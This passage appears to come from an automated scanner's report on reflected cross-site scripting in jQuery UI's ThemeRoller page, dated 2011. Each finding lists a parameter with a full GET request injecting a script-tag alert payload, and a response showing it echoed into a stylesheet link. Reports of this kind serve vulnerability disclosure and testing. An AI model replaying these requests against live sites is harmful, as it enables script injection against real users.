X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
pacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555dbdc8"><script>alert(1)</script>192e61c2ff2&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.
...[SNIP]...

3.84. http://jqueryui.com/themeroller/ [fcError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the double-quoted href attribute of the <link rel="stylesheet"> tag that loads /themeroller/css/parseTheme.css.php (the response snippet below shows the reflection inside that stylesheet query string); this is the same sink as the other ThemeRoller parameter findings in this section. The payload c7fbc"><script>alert(1)</script>e518040edc1 was submitted in the fcError parameter and was echoed unmodified in the response, so the " closes the attribute value, the > closes the tag, and the <script> element that follows is parsed and executed.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ac7fbc"><script>alert(1)</script>e518040edc1&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ac7fbc"><script>alert(1)</script>e518040edc1&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

3.85. http://jqueryui.com/themeroller/ [fcHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the double-quoted href attribute of the <link rel="stylesheet"> tag that loads /themeroller/css/parseTheme.css.php (the response snippet below shows the reflection inside that stylesheet query string); this is the same sink as the other ThemeRoller parameter findings in this section. The payload 3d936"><script>alert(1)</script>738d6424a3a was submitted in the fcHeader parameter and was echoed unmodified in the response, so the " closes the attribute value, the > closes the tag, and the <script> element that follows is parsed and executed.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=2222223d936"><script>alert(1)</script>738d6424a3a&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=2222223d936"><script>alert(1)</script>738d6424a3a&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefau
...[SNIP]...

3.86. http://jqueryui.com/themeroller/ [fcHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the double-quoted href attribute of the <link rel="stylesheet"> tag that loads /themeroller/css/parseTheme.css.php (the response snippet below shows the reflection inside that stylesheet query string); this is the same sink as the other ThemeRoller parameter findings in this section. The payload 803b3"><script>alert(1)</script>7c85cb6c075 was submitted in the fcHighlight parameter and was echoed unmodified in the response, so the " closes the attribute value, the > closes the tag, and the <script> element that follows is parsed and executed.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636803b3"><script>alert(1)</script>7c85cb6c075&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636803b3"><script>alert(1)</script>7c85cb6c075&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_fl
...[SNIP]...

3.87. http://jqueryui.com/themeroller/ [fcHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the double-quoted href attribute of the <link rel="stylesheet"> tag that loads /themeroller/css/parseTheme.css.php (the response snippet below shows the reflection inside that stylesheet query string); this is the same sink as the other ThemeRoller parameter findings in this section. The payload 1068c"><script>alert(1)</script>7eef4e3fb21 was submitted in the fcHover parameter and was echoed unmodified in the response, so the " closes the attribute value, the > closes the tag, and the <script> element that follows is parsed and executed.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=2121211068c"><script>alert(1)</script>7eef4e3fb21&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=2121211068c"><script>alert(1)</script>7eef4e3fb21&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight
...[SNIP]...

3.88. http://jqueryui.com/themeroller/ [ffDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the double-quoted href attribute of the <link rel="stylesheet"> tag that loads /themeroller/css/parseTheme.css.php (the tag is visible in the response snippet below; ffDefault is the first parameter, so the payload sits right after the ctl=themeroller prefix); this is the same sink as the other ThemeRoller parameter findings in this section. The payload 18ad2"><script>alert(1)</script>136246c6494 was submitted in the ffDefault parameter and was echoed unmodified in the response, so the " closes the attribute value, the > closes the tag, and the <script> element that follows is parsed and executed.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif18ad2"><script>alert(1)</script>136246c6494&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:16:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif18ad2"><script>alert(1)</script>136246c6494&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgCol
...[SNIP]...

3.89. http://jqueryui.com/themeroller/ [fsDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the double-quoted href attribute of the <link rel="stylesheet"> tag that loads /themeroller/css/parseTheme.css.php (the tag is visible in the response snippet below); this is the same sink as the other ThemeRoller parameter findings in this section. The payload 3b4e4"><script>alert(1)</script>34d5273700b was submitted in the fsDefault parameter and was echoed unmodified in the response, so the " closes the attribute value, the > closes the tag, and the <script> element that follows is parsed and executed.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em3b4e4"><script>alert(1)</script>34d5273700b&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:16:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em3b4e4"><script>alert(1)</script>34d5273700b&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent
...[SNIP]...

3.90. http://jqueryui.com/themeroller/ [fwDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19ae2"><script>alert(1)</script>6922eb8ad9f was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal19ae2"><script>alert(1)</script>6922eb8ad9f&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:16:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119977

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal19ae2"><script>alert(1)</script>6922eb8ad9f&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&
...[SNIP]...

3.91. http://jqueryui.com/themeroller/ [iconColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f5f4"><script>alert(1)</script>c47e4b86f7e was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=4545456f5f4"><script>alert(1)</script>c47e4b86f7e&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=4545456f5f4"><script>alert(1)</script>c47e4b86f7e&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pn
...[SNIP]...

3.92. http://jqueryui.com/themeroller/ [iconColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88cfb"><script>alert(1)</script>71936ccf771 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22222288cfb"><script>alert(1)</script>71936ccf771&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
